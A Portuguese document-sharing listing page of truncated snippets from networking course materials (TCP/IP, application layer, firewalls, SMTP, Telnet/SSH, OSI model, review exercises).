Redes de Computadores. Protocolos de comunicação: TCP, UDP Redes de Computadores Protocolos de comunicação: TCP, UDP Introdução ao TCP/IP Transmission Control Protocol/ Internet Protocol (TCP/IP) é um conjunto de protocolos de comunicação utilizados para a troca

Leia mais

Introdução à Camada de Aplicação. Prof. Eduardo

Introdução à Camada de Aplicação. Prof. Eduardo Introdução à Camada de Aplicação RC Prof. Eduardo Introdução Você sabe que existem vários tipos de programas na Internet? - Talvez você já tenha notado que existem vários programas diferentes para cada

Leia mais

Redes de Computadores Camada de Aplicação. Prof. MSc. Hugo Souza

Redes de Computadores Camada de Aplicação. Prof. MSc. Hugo Souza Redes de Computadores Camada de Aplicação Prof. MSc. Hugo Souza É a camada que dispõe a programação para as aplicações de rede através dos protocolos de aplicação; Provém a implantação da arquitetura de

Leia mais

FIREWALL. Prof. Fabio de Jesus Souza. fabiojsouza@gmail.com. Professor Fabio Souza

FIREWALL. Prof. Fabio de Jesus Souza. fabiojsouza@gmail.com. Professor Fabio Souza FIREWALL Prof. Fabio de Jesus Souza fabiojsouza@gmail.com Professor Fabio Souza O que são Firewalls? Os firewalls são sistemas de segurança que podem ser baseados em: um único elemento de hardware; um

Leia mais

PROJETO DE REDES www.projetoderedes.com.br

PROJETO DE REDES www.projetoderedes.com.br PROJETO DE REDES www.projetoderedes.com.br Curso de Tecnologia em Redes de Computadores Disciplina: Tópicos Avançados II 5º período Professor: José Maurício S. Pinheiro AULA 2: Padrão X.509 O padrão X.509

Leia mais

Camada de Aplicação. Prof. Eduardo

Camada de Aplicação. Prof. Eduardo Camada de Aplicação RC Prof. Eduardo Introdução Você sabe que existem vários tipos de programas na Internet? - Talvez você já tenha notado que existem vários programas diferentes para cada um desses tipos.

Leia mais

Gerência de Segurança

Gerência de Segurança Gerência de segurança envolve a proteção de dados sensíveis dos dispositivos de rede através do controle de acesso aos pontos onde tais informações se localizam Benefícios do processo de gerência de segurança

Leia mais

USO GERAL DOS PROTOCOLOS SMTP, FTP, TCP, UDP E IP

USO GERAL DOS PROTOCOLOS SMTP, FTP, TCP, UDP E IP USO GERAL DOS PROTOCOLOS SMTP, FTP, TCP, UDP E IP SMTP "Protocolo de transferência de correio simples (ou em inglês Simple Mail Transfer Protocol ) é o protocolo padrão para envio de e- mails através da

Leia mais

Capítulo 8 - Aplicações em Redes

Capítulo 8 - Aplicações em Redes Capítulo 8 - Aplicações em Redes Prof. Othon Marcelo Nunes Batista Mestre em Informática 1 de 31 Roteiro Sistemas Operacionais em Rede Modelo Cliente-Servidor Modelo P2P (Peer-To-Peer) Aplicações e Protocolos

Leia mais

Projeto de Redes de Computadores. Projeto do Esquema de Endereçamento e de Nomes

Projeto de Redes de Computadores. Projeto do Esquema de Endereçamento e de Nomes Projeto do Esquema de Endereçamento e de Nomes Lembrar a estrutura organizacional do cliente ajuda a planejar a atribuição de endereços e nomes O mapa topológico também ajuda, pois indica onde há hierarquia

Leia mais

Aula prática. Objetivo IPCONFIG. Prof. Leandro Pykosz Leandro@sulbbs.com.br. Informa a configuração atual de rede da máquina;

Aula prática. Objetivo IPCONFIG. Prof. Leandro Pykosz Leandro@sulbbs.com.br. Informa a configuração atual de rede da máquina; Aula prática Prof. Leandro Pykosz Leandro@sulbbs.com.br Objetivo Nesta aula, você aprenderá a utilizar alguns utilitários de rede que podem ajudá-lo a identificar problemas na rede. No windows existem

Leia mais

SMTP, POP, IMAP, DHCP e SNMP. Professor Leonardo Larback

SMTP, POP, IMAP, DHCP e SNMP. Professor Leonardo Larback SMTP, POP, IMAP, DHCP e SNMP Professor Leonardo Larback Protocolo SMTP O SMTP (Simple Mail Transfer Protocol) é utilizado no sistema de correio eletrônico da Internet. Utiliza o protocolo TCP na camada

Leia mais

Modelo de referência OSI. Modelo TCP/IP e Internet de cinco camadas

Modelo de referência OSI. Modelo TCP/IP e Internet de cinco camadas Modelo de referência OSI. Modelo TCP/IP e Internet de cinco camadas Conhecer os modelo OSI, e TCP/IP de cinco camadas. É importante ter um padrão para a interoperabilidade entre os sistemas para não ficarmos

Leia mais

Protocolos Telnet e SSH. Professor Leonardo Larback

Protocolos Telnet e SSH. Professor Leonardo Larback Protocolos Telnet e SSH Professor Leonardo Larback Protocolo Telnet O modelo de referência TCP/IP inclui um protocolo simples de terminal remoto: Telnet. O telnet é tanto um programa quanto um protocolo,

Leia mais

Arquitetura e Protocolos de Rede TCP/IP. Modelo Arquitetural

Arquitetura e Protocolos de Rede TCP/IP. Modelo Arquitetural Arquitetura e Protocolos de Rede TCP/IP Modelo Arquitetural Motivação Realidade Atual Ampla adoção das diversas tecnologias de redes de computadores Evolução das tecnologias de comunicação Redução dos

Leia mais

3. Explique o motivo pelo qual os protocolos UDP e TCP acrescentam a informação das portas (TSAP) de origem e de destino em seu cabeçalho.

3. Explique o motivo pelo qual os protocolos UDP e TCP acrescentam a informação das portas (TSAP) de origem e de destino em seu cabeçalho. Entregue três questões de cada prova. Prova de 2011-02 1. Descreva duas maneiras de estabelecer uma conexão entre processos na camada de transporte sem o conhecimento da porta (TSAP) ao qual o servidor

Leia mais

Microsoft Office Outlook Web Access ABYARAIMOVEIS.COM.BR

Microsoft Office Outlook Web Access ABYARAIMOVEIS.COM.BR Microsoft Office Outlook Web Access ABYARAIMOVEIS.COM.BR 1 Índice: 01- Acesso ao WEBMAIL 02- Enviar uma mensagem 03- Anexar um arquivo em uma mensagem 04- Ler/Abrir uma mensagem 05- Responder uma mensagem

Leia mais

Interconexão de Redes. Aula 03 - Roteamento IP. Prof. Esp. Camilo Brotas Ribeiro cribeiro@catolica-es.edu.br

Interconexão de Redes. Aula 03 - Roteamento IP. Prof. Esp. Camilo Brotas Ribeiro cribeiro@catolica-es.edu.br Interconexão de Redes Aula 03 - Roteamento IP Prof. Esp. Camilo Brotas Ribeiro cribeiro@catolica-es.edu.br Revisão Repetidor Transceiver Hub Bridge Switch Roteador Domínio de Colisão Domínio de Broadcast

Leia mais

Manual do Desktop Sharing. Brad Hards Tradução: Marcus Gama

Manual do Desktop Sharing. Brad Hards Tradução: Marcus Gama Brad Hards Tradução: Marcus Gama 2 Conteúdo 1 Introdução 5 2 O protocolo do Buffer de Quadro Remoto (Buffer de Quadro Remoto) 6 3 Usando o Desktop Sharing 7 3.1 Gerenciando convites do Desktop Sharing........................

Leia mais

AULA 03 MODELO OSI/ISO. Eduardo Camargo de Siqueira REDES DE COMPUTADORES Engenharia de Computação

AULA 03 MODELO OSI/ISO. Eduardo Camargo de Siqueira REDES DE COMPUTADORES Engenharia de Computação AULA 03 MODELO OSI/ISO Eduardo Camargo de Siqueira REDES DE COMPUTADORES Engenharia de Computação INTRODUÇÃO 2 INTRODUÇÃO 3 PROTOCOLOS Protocolo é a regra de comunicação usada pelos dispositivos de uma

Leia mais

UNIVERSIDADE FEDERAL DE PELOTAS

UNIVERSIDADE FEDERAL DE PELOTAS Usando um firewall para ajudar a proteger o computador A conexão à Internet pode representar um perigo para o usuário de computador desatento. Um firewall ajuda a proteger o computador impedindo que usuários

Leia mais

SISTEMAS DISTRIBUIDOS

SISTEMAS DISTRIBUIDOS 1 2 Caracterização de Sistemas Distribuídos: Os sistemas distribuídos estão em toda parte. A Internet permite que usuários de todo o mundo acessem seus serviços onde quer que possam estar. Cada organização

Leia mais

Sistemas Operacionais. Prof. André Y. Kusumoto andrekusumoto.unip@gmail.com

Sistemas Operacionais. Prof. André Y. Kusumoto andrekusumoto.unip@gmail.com Sistemas Operacionais Prof. André Y. Kusumoto andrekusumoto.unip@gmail.com Estruturas de Sistemas Operacionais Um sistema operacional fornece o ambiente no qual os programas são executados. Internamente,

Leia mais

4. Qual seria o impacto da escolha de uma chave que possua letras repetidas em uma cifra de transposição?

4. Qual seria o impacto da escolha de uma chave que possua letras repetidas em uma cifra de transposição? Prova de 2011-02 1. Descreva duas maneiras de estabelecer uma conexão entre processos na camada de transporte sem o conhecimento da porta (TSAP) ao qual o servidor remoto esteja associado. 2. Estabelecer

Leia mais

Auditoria e Segurança de Sistemas Segurança de Redes de Computadores Adriano J. Holanda

Auditoria e Segurança de Sistemas Segurança de Redes de Computadores Adriano J. Holanda Auditoria e Segurança de Sistemas Segurança de Redes de Computadores Adriano J. Holanda Segurança na rede Segurança na rede refere-se a qualquer atividade planejada para proteger sua rede. Especificamente

Leia mais

Execícios de Revisão Redes de Computadores Edgard Jamhour. Filtros de Pacotes Criptografia SSL

Execícios de Revisão Redes de Computadores Edgard Jamhour. Filtros de Pacotes Criptografia SSL Execícios de Revisão Redes de Computadores Edgard Jamhour Filtros de Pacotes Criptografia SSL Exercício 1 Configure as regras do filtro de pacotes "E" para permitir que os computadores da rede interna

Leia mais

Execícios de Revisão Redes de Computadores Edgard Jamhour. Proxy, NAT Filtros de Pacotes

Execícios de Revisão Redes de Computadores Edgard Jamhour. Proxy, NAT Filtros de Pacotes Execícios de Revisão Redes de Computadores Edgard Jamhour Proxy, NAT Filtros de Pacotes Exercício 1 Configure as regras do filtro de pacotes "E" para permitir que os computadores da rede interna tenham

Leia mais

Mais configuração OptraImage

Mais configuração OptraImage 1 fax Personalizarconfiguraçõesdecópia...2 Definirmanualmenteasinformaçõesbásicasdofax...3 Criardestinospermanentesdefax...5 Alterarasconfiguraçõesderecebereenviarfax...7 Ajustarasopçõesdeenviodefax...8

Leia mais

Submissão Autenticada de Ficheiros ao SIGEX

Submissão Autenticada de Ficheiros ao SIGEX Submissão Autenticada de Ficheiros ao SIGEX Segurança em Sistemas Informáticos José Martins - ei06031@fe.up.pt Marcelo Cerqueira - ei06093@fe.up.pt Grupo 10, T4 Índice Introdução... 3 Problema e Objectivos...

Leia mais